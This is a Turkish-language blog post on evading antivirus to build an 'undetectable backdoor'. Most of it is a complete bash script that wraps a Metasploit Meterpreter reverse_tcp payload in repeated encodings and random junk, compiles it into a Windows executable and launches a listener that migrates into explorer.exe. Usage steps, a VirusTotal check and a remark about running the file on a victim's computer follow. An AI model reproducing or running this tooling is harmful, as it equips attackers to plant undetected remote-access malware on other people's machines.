Anvirus Bypass – Tanınmaz Arka Kapı(Backdoor) Oluşturma

Nasıl Çalışıyor,
Metasploit ile oluşturulan shell code defalarca farklı encoding teknikleri ile encode ediliyor ve shell codun içine random junk kodlar ekleniyor. Shell code çalıştırılabilir dosyaya dönüştürüldüğünde antivusler tarafından imzası olmadığı için tanınmıyor.

#!/bin/bash
echo "************************************************************"
echo " Automatic shellcode generator - FOR METASPLOIT "
echo " By Astr0baby 2011 "
echo " With some Randomic gravy and sauce to bypass Antivirus "
echo " For Automatic Teensy programming and deployment "
echo "************************************************************"
rm -rf ShellCode

echo "Here is a network device list available on yor machine"
cat /proc/net/dev | tr -s ' ' | cut -d ' ' -f1,2 | sed -e '1,2d'
echo -e "What network interface are we gonna use ? c"
read interface
echo -e "What Port Number are we gonna listen to? : c"
read port
echo -e "Please enter a random seed number 1-10000, the larger the number the larger the resulting executable : c"
read seed
echo -e "And lastly how many times do we want to encode our payloads 1-20? : c"
read enumber
# Get OS name
OS=`uname`
IO="" # store IP
case $OS in
Linux) IP=`ifconfig $interface | grep 'inet addr:'| grep -v '127.0.0.1' | cut -d: -f2 | awk '{ print $1}'`;;
*) IP="Unknown";;
esac
#echo "$IP"
msfpayload windows/meterpreter/reverse_tcp LHOST=$IP LPORT=$port EXITFUNC=thread R | msfencode -e x86/shikata_ga_nai -c $enumber -t raw | msfencode -e x86/jmp_call_additive -c $enumber -t raw | msfencode -e x86/call4_dword_xor -c $enumber -t raw | msfencode -e x86/shikata_ga_nai -c $enumber > test.c
mkdir ShellCode
mv test.c ShellCode
cd ShellCode
#Replacing plus signs at the end of line
sed -e 's/+/ /g' test.c > clean.c
sed -e 's/buf = /unsigned char micro[]=/g' clean.c > ready.c
echo "#include <stdio.h>" >> temp
echo 'unsigned char ufs[]=' >> temp
for (( i=1; i<=10000;i++ )) do echo $RANDOM $i; done | sort -k1| cut -d " " -f2| head -$seed >> temp2
sed -i 's/$/"/' temp2
sed -i 's/^/"/' temp2
echo ';' >> temp2
cat temp2 >> temp
cat ready.c >> temp
mv temp ready2.c
echo ";" >> ready2.c
echo "int main(void) { ((void (*)())micro)();}" >> ready2.c
mv ready2.c final.c
echo 'unsigned char tap[]=' > temp3
for (( i=1; i<=999999;i++ )) do echo $RANDOM $i; done | sort -k1| cut -d " " -f2| head -$seed >> temp4
sed -i 's/$/"/' temp4
sed -i 's/^/"/' temp4
echo ';' >> temp4
cat temp4 >> temp3
cat temp3 >> final.c
#Cleanup
rm -f clean.c
rm -f test.c
rm -f ready.c
rm -f rand.c
rm -f temp2
rm -f temp3
rm -f temp4

/usr/bin/i586-mingw32msvc-gcc -Wall ./final.c -o ./final.exe > /dev/null 2>&1
mv final.exe $RANDOM.exe
filex=`ls -ct1 | head -1`
sumx=`sha1sum $filex`
echo $filex "...generated in ShellCode subfolder"
echo $filex "sha1checksum is .." $sumx
strip --strip-debug $filex
cd ..
echo " starting the meterpreter listener..."
sleep 2
msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=$IP LPORT=$port AutoRunScript=' migrate2 explorer.exe' E

Scriptin kullanılması:

# chmod +x ud-msf.sh

# ./ud-msf.sh

 

Oluşan  dosya

# file 29442.exe
29442.exe: PE32 executable for MS Windows (console) Intel 80386 32-bit

www.virustotal.com tarama sonucu

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

29442.exe dosyası kurban bilgisayarda çalıştırıldığında casus yazılım ile irtibat kurulmuş olur.

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Yorum Yaz

E-posta adresiniz yayınlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir

*
*

Mail listemize üye olarak eğitim fırsatlarını kaçırmayın!
Eğitim ve ücretsiz etkinliklerizden haberdar olmak için e-posta listesimize üye olun!.